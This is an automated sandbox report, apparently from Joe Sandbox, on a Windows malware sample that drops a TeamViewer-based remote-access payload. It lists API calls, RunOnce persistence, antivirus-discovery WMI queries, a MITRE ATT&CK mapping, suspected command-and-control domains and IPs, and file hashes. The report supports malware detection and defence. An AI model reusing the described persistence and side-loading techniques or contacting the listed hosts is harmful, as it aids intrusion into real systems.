Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_0054B459 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDList,74E3A680,lstrcat,lstrlen,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70988AF0 EntryPoint,DisableThreadLibraryCalls,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryW,ExitProcess,PathAddBackslashW,PathAddBackslashW,GetProcessHeap,HeapAlloc,GetModuleFileNameW,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecW,PathAddBackslashW,SetCurrentDirectoryW,SHGetSpecialFolderPathW,PathAddBackslashW,StrChrW,lstrcatW,GetFileAttributesW,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameW,PathFindFileNameW,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetUserNameW,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,lstrlenW,GetCommandLineW,CommandLineToArgvW,CharLowerW,StrToIntW,LocalFree,RtlZeroMemory,GetPrivateProfileIntW,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,StrChrW,StrChrW,wsprintfW,wsprintfW,LoadLibraryW,ExitProcess,StrChrW,wsprintfW,LoadLibraryW,FindWindowW,FindWindowW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,StrChrW,wsprintfW,GetProcessHeap,HeapFree,LoadLibraryW,StrChrW,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)
Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
Source: svchost.exe, 0000000E.00000002.512252539.0000015E8B440000.00000004.00000001.sdmp Binary or memory string: "@V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 0000000E.00000002.510953306.0000015E8B413000.00000004.00000001.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_00511D6F __EH_prolog3_catch,_memset,_memset,socket,WSAGetLastError,htonl,inet_addr,htons,WSAGetLastError,bind,bind,WSAGetLastError,Sleep,bind,listen,WSAGetLastError,select,WSAGetLastError,getsockname,WSAGetLastError,Sleep,__WSAFDIsSet,accept,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,WSAGetLastError,Sleep,GetTickCount,__WSAFDIsSet,WSAGetLastError,_strncmp,_strncmp,_strncpy,shutdown,Sleep,listen,Sleep,listen,WSAGetLastError,accept,Sleep,_memset,WSAGetLastError,_memset,select,_strncmp,

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts 2 | Windows Management Instrumentation 111 | DLL Side-Loading 11 | DLL Side-Loading 11 | Disable or Modify Tools 1 | Input Capture 1 | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
Default Accounts | Native API 1 | DLL Search Order Hijacking 2 | DLL Search Order Hijacking 2 | Deobfuscate/Decode Files or Information 1 | LSASS Memory | Account Discovery 1 | Remote Desktop Protocol | Screen Capture 1 | Exfiltration Over Bluetooth | Encrypted Channel 21 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Service Execution 12 | Create Account 1 | Valid Accounts 2 | Obfuscated Files or Information 2 | Security Account Manager | File and Directory Discovery 3 | SMB/Windows Admin Shares | Input Capture 1 | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Valid Accounts 2 | Access Token Manipulation 21 | Software Packing 1 | NTDS | System Information Discovery 36 | Distributed Component Object Model | Clipboard Data 1 | Scheduled Transfer | Application Layer Protocol 14 | SIM Card Swap |  | Carrier Billing Fraud
Cloud Accounts | Cron | Windows Service 22 | Windows Service 22 | DLL Side-Loading 11 | LSA Secrets | Query Registry 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Registry Run Keys / Startup Folder 1 | Process Injection 12 | DLL Search Order Hijacking 2 | Cached Domain Credentials | Security Software Discovery 371 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Registry Run Keys / Startup Folder 1 | Masquerading 11 | DCSync | Virtualization/Sandbox Evasion 12 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Valid Accounts 2 | Proc Filesystem | Process Discovery 2 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Virtualization/Sandbox Evasion 12 | /etc/passwd and /etc/shadow | System Owner/User Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station |  | Data Destruction
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Access Token Manipulation 21 | Network Sniffing | Remote System Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols |  |  | Data Encrypted for Impact
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Process Injection 12 | Input Capture | System Network Configuration Discovery 1 | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols |  |  | Service Stop

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
wogZe27GBB.exe | 9% | Metadefender |
wogZe27GBB.exe | 71% | ReversingLabs | Win32.Worm.AutoRun

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll | 6% | Metadefender |
C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll | 51% | ReversingLabs | Win32.Trojan.Phonzy
C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dll | 0% | Metadefender |
C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | 0% | Metadefender |
C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe | 0% | ReversingLabs |

Unpacked PE Files

Source | Detection | Scanner | Label
0.2.wogZe27GBB.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen2
0.0.wogZe27GBB.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
https://widolapsed.info/8C631A8/resource://Microso0%Avira URL Cloudsafe
https://widolapsed.info/B8C631A8/leUI/resources/Pkg0%Avira URL Cloudsafe
https://widolapsed.info/8C631A8/al_cw5n1h2txyewy?m00%Avira URL Cloudsafe
https://widolapsed.info/apsed.info/3DViewer_2.1803.8022.0_x64_0%Avira URL Cloudsafe
http://ocsp.sectigo.com00%URL Reputationsafe
https://widolapsed.info/apsed.info/B8C631A8/lopmentPropertiesh0%Avira URL Cloudsafe
http://188.172.198.151/0%Avira URL Cloudsafe
https://widolapsed.info/10%Avira URL Cloudsafe
https://widolapsed.info/s/StoreAppName0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
master12.teamviewer.com | 185.188.32.22 | true | false | | high
widolapsed.info | 45.153.241.148 | true | false | | high
ping3.dyngate.com | unknown | unknown | false | | high

Contacted URLs


URLs from Memory and Binaries

                                                                                            high
                                                                                            http://master12.teamviewer.com/dout.aspx?s=40082873&p=10000001&client=DynGate&data=FyQS6QChtjSytzoeqUniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              https://widolapsed.info/8C631A8/al_cw5n1h2txyewy?m0UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://widolapsed.info/apsed.info/3DViewer_2.1803.8022.0_x64_UniPrint.exe, 00000004.00000003.446837962.00000000057D5000.00000004.00000001.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://ocsp.sectigo.com0wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 0000000B.00000002.317218573.000001BF6063D000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  https://widolapsed.info/apsed.info/B8C631A8/lopmentPropertieshUniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  http://188.172.198.151/UniPrint.exe, 00000004.00000003.297421541.0000000000AD4000.00000004.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://widolapsed.info/1UniPrint.exe, 00000004.00000003.325324514.00000000057D5000.00000004.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://widolapsed.info/s/StoreAppNameUniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  http://www.teamviewer.com/download/version_5x/TeamViewerQS.exewogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpfalse
                                                                                                    high
                                                                                                    https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 0000000B.00000003.316808390.000001BF60641000.00000004.00000001.sdmpfalse
                                                                                                      high

                                                                                                      Contacted IPs


                                                                                                      Public

IP | Domain | Country | ASN | ASN Name | Malicious
185.188.32.22 | master12.teamviewer.com | Germany | 43304 | TEAMVIEWER-ASDE | false
188.172.198.151 | unknown | Austria | 42473 | AS-ANEXIAANEXIAInternetdienstleistungsGmbHAT | false
45.153.241.148 | widolapsed.info | Germany | 30823 | COMBAHTONcombahtonGmbHDE | false

                                                                                                      Private

                                                                                                      IP
                                                                                                      192.168.2.1
                                                                                                      127.0.0.1

                                                                                                      General Information

                                                                                                      Joe Sandbox Version:33.0.0 White Diamond
                                                                                                      Analysis ID:483790
                                                                                                      Start date:15.09.2021
                                                                                                      Start time:13:43:48
                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                      Overall analysis duration:0h 15m 13s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:light
                                                                                                      Sample file name:wogZe27GBB (renamed file extension from none to exe)
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                      Number of analysed new started processes analysed:28
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:0
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • HDC enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Detection:MAL
                                                                                                      Classification:mal76.evad.winEXE@23/18@4/5
                                                                                                      EGA Information:Failed
                                                                                                      HDC Information:
                                                                                                      • Successful, ratio: 23% (good quality ratio 22.2%)
                                                                                                      • Quality average: 82.6%
                                                                                                      • Quality standard deviation: 25.5%
                                                                                                      HCA Information:Failed
                                                                                                      Cookbook Comments:
                                                                                                      • Adjust boot time
                                                                                                      • Enable AMSI
                                                                                                      Warnings:
                                                                                                      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, UsoClient.exe
                                                                                                      • TCP Packets have been reduced to 100
                                                                                                      • Excluded IPs from analysis (whitelisted): 23.35.236.56, 20.82.210.154, 209.197.3.8, 40.112.88.60, 23.216.77.208, 23.216.77.209, 20.54.110.249
                                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, cds.d2s7q6s2.hwcdn.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                      • VT rate limit hit for: /opt/package/joesandbox/database/analysis/483790/sample/wogZe27GBB.exe

                                                                                                      Simulations

                                                                                                      Behavior and APIs

Time | Type | Description
13:45:03 | API Interceptor | 2x Sleep call for process: svchost.exe modified
13:45:17 | API Interceptor | 45x Sleep call for process: UniPrint.exe modified
13:45:23 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce UniPrint.exe "C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe" f
13:45:31 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce UniPrint.exe "C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe" f
13:46:22 | API Interceptor | 1x Sleep call for process: MpCmdRun.exe modified

                                                                                                      Joe Sandbox View / Context

                                                                                                      IPs

                                                                                                      No context

                                                                                                      Domains

                                                                                                      No context

                                                                                                      ASN

                                                                                                      No context

                                                                                                      JA3 Fingerprints

                                                                                                      No context

                                                                                                      Dropped Files

                                                                                                      No context

                                                                                                      Created / dropped Files

                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4096
                                                                                                      Entropy (8bit):0.5981930978381301
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:0FIEk1GaD0JOCEfMuaaD0JOCEfMKQmDctAl/gz2cE0fMbhEZolrRSQ2hyYIIT:0kGaD0JcaaD0JwQQctAg/0bjSQJ
                                                                                                      MD5:9583F7C60F8EFC7CB04E9CFB7A705D43
                                                                                                      SHA1:72086359D312BEF7D4ECF7597594643796108F64
                                                                                                      SHA-256:04F0ECC8F9FCBFDEFD04601E9249E32B78E12E985F15059E91EF4B9DF138E4AE
                                                                                                      SHA-512:5F2D38182933C9B7AAAAE8782F93EAF39F6BFBE7549FDF7D1D9B2EA2859F60880A1217FD9E577ABE2CDB6EA1C4AA2E01F6D0FB1D9CA1C08776D1DDD5EE35D428
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0xbcd629f4, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                      Category:dropped
                                                                                                      Size (bytes):32768
                                                                                                      Entropy (8bit):0.09602595647092171
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:lX0+pO4blOcrEU8KPX0+pO4blOcrEU8K:lE3vUfE3vU
                                                                                                      MD5:17572DB7D0DBC703232DAC6C89A6FD7F
                                                                                                      SHA1:DE7A84F48AFA0F3577751814C5CA65D2A3BB6E22
                                                                                                      SHA-256:9AC0533D9388A9CB1739476F26A9A8E8E169EFD840A136815C0C144AAEAE407A
                                                                                                      SHA-512:D0EE9AE240AE18D039E6C585F6A77B506391B47B9BFBCFB7958004D06A9E1BC862E640767272959A0948541267FA7098C3C9E1F31A6F221633828165639426CF
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8192
                                                                                                      Entropy (8bit):0.11125039857702498
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:al/7EvmIsMkl/bJdAtiyUXAll:al/imIs5t4rUA
                                                                                                      MD5:5D4C153B6F12CDE3CD90442430CA538E
                                                                                                      SHA1:8EEE4570E5CFE88F9183FD76A2657FAFB4532935
                                                                                                      SHA-256:B0587864D6A961113666F0EA1592A36E5FDAB791C9186EB05C4DF5E7191CCDD0
                                                                                                      SHA-512:BE69F790037122ED95E0457206F0CE46DF9642E10E415ECEFD07813D3008E2E272D055B327F1897B6AFBB5B8E18817EA4274B6B3B39AED375DD0FD7881541F8C
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):0.11021407349750637
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:264YVXm/Ey6q9995Aidxq3qQ10nMCldimE8eawHjciBd:26Ql68+LyMCldzE9BHjcib
                                                                                                      MD5:0F5698D5106A8089EA0BB644C37CEB2D
                                                                                                      SHA1:26DF04F16CA2B0B83C9376ECEE8DDA62E8372C56
                                                                                                      SHA-256:BB5018BFD89CBC4BFC9090A599A8B3D26BDD524E8FF57CE28C2B4150406A67E0
                                                                                                      SHA-512:1DF0277D6DCEF9781D5923DC2ACEF22A320FD811C8D31500A262A4D0E00CFA8968DAB8CD8E25ECC9692E67969376104D1B0883A4E23578ECDE7EAB2AAAB533F3
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):0.11252079590661898
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:MXm/Ey6q9995AiM1miM3qQ10nMCldimE8eawHza1miI9q:1l68c1tMLyMCldzE9BHza1tI9q
                                                                                                      MD5:199F51F7E2863E1151E16C36ECE8CA1E
                                                                                                      SHA1:44F041F381CB2A84C6B2172ACDB6ECAED3EFAEF9
                                                                                                      SHA-256:38AFB0BE5D41DADA846EA8799E62F16EA49F50E27D845FFFA7D549869181B558
                                                                                                      SHA-512:1248839F5D6936DB8A441998ED604D496632EEB9454695BDE49A4014E74EC95B9C7DF660674844046B98C865BA0EA1412C851E5AD706CAB9449967006A3F3B5C
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):0.11266350359777126
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:sXm/Ey6q9995AiV1mK2P3qQ10nMCldimE8eawHza1mK0o:Vl68F1iPLyMCldzE9BHza1Ao
                                                                                                      MD5:7FE29FA15487F70C9F2D9D91A03834F4
                                                                                                      SHA1:2E4A5F7DD714C5E6CA62F1CB46D16861E9925F57
                                                                                                      SHA-256:3B4B910F462DD42F39DE8DA3A10C8EC5AC59CF8AF16F18BF6AE8DEA9B56111BF
                                                                                                      SHA-512:946AE018403FC99AFD1EECC188847B7630478157EFA77EEB4F24FE0397A534EE095076516CD4F8C7ECB0D1EB93201A698806CBCC61DA268DD723FD91C550114D
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      C:\Users\user\AppData\Local\Temp\nsaF7DF.tmp
                                                                                                      Process:C:\Users\user\Desktop\wogZe27GBB.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):5131242
                                                                                                      Entropy (8bit):6.736055511669049
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:98304:xmfzCAW6LcJjdgHPmMogx1WZRkPapqj+ZG/D+AKbS5CjH:xmfzCgEqHuMogsRkyq0X
                                                                                                      MD5:1E6978657EEB4A9F6B4E84C62B228EE4
                                                                                                      SHA1:496A37AE9417163CFF53FBFEA9BA5BD1AC6BAFAE
                                                                                                      SHA-256:0FFB6906EA4C7B9A2E97FE0B8A205E00C8E5B1A7E03038627B1E6681CC66B986
                                                                                                      SHA-512:412332869C2B7C90A5409338EBBFF96786AEADDAA54A0BA1F0D96035E929D7DFB773A2E02F8C588F15739A3CE0211DAE6074EEFE94AE18F85B5C4FA2C6BCBC6B
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.0001.. (copy)
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):0.11021407349750637
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:264YVXm/Ey6q9995Aidxq3qQ10nMCldimE8eawHjciBd:26Ql68+LyMCldzE9BHjcib
                                                                                                      MD5:0F5698D5106A8089EA0BB644C37CEB2D
                                                                                                      SHA1:26DF04F16CA2B0B83C9376ECEE8DDA62E8372C56
                                                                                                      SHA-256:BB5018BFD89CBC4BFC9090A599A8B3D26BDD524E8FF57CE28C2B4150406A67E0
                                                                                                      SHA-512:1DF0277D6DCEF9781D5923DC2ACEF22A320FD811C8D31500A262A4D0E00CFA8968DAB8CD8E25ECC9692E67969376104D1B0883A4E23578ECDE7EAB2AAAB533F3
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001 (copy)
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):0.11252079590661898
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:MXm/Ey6q9995AiM1miM3qQ10nMCldimE8eawHza1miI9q:1l68c1tMLyMCldzE9BHza1tI9q
                                                                                                      MD5:199F51F7E2863E1151E16C36ECE8CA1E
                                                                                                      SHA1:44F041F381CB2A84C6B2172ACDB6ECAED3EFAEF9
                                                                                                      SHA-256:38AFB0BE5D41DADA846EA8799E62F16EA49F50E27D845FFFA7D549869181B558
                                                                                                      SHA-512:1248839F5D6936DB8A441998ED604D496632EEB9454695BDE49A4014E74EC95B9C7DF660674844046B98C865BA0EA1412C851E5AD706CAB9449967006A3F3B5C
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001cd (copy)
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):0.11266350359777126
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:sXm/Ey6q9995AiV1mK2P3qQ10nMCldimE8eawHza1mK0o:Vl68F1iPLyMCldzE9BHza1Ao
                                                                                                      MD5:7FE29FA15487F70C9F2D9D91A03834F4
                                                                                                      SHA1:2E4A5F7DD714C5E6CA62F1CB46D16861E9925F57
                                                                                                      SHA-256:3B4B910F462DD42F39DE8DA3A10C8EC5AC59CF8AF16F18BF6AE8DEA9B56111BF
                                                                                                      SHA-512:946AE018403FC99AFD1EECC188847B7630478157EFA77EEB4F24FE0397A534EE095076516CD4F8C7ECB0D1EB93201A698806CBCC61DA268DD723FD91C550114D
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll
                                                                                                      Process:C:\Users\user\Desktop\wogZe27GBB.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):73696
                                                                                                      Entropy (8bit):6.629217484187715
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:DWNCi7sBIpvYqSRw6zhD16poDVDREv1Mme9MfPGz49jjZLq00RKi5jYjfLhs8WhU:A6BmmPX6mDVdme9uGzWH10I+Uje8WhU
                                                                                                      MD5:AC34AB95CBC23CDF332BEA2CC0FFBF35
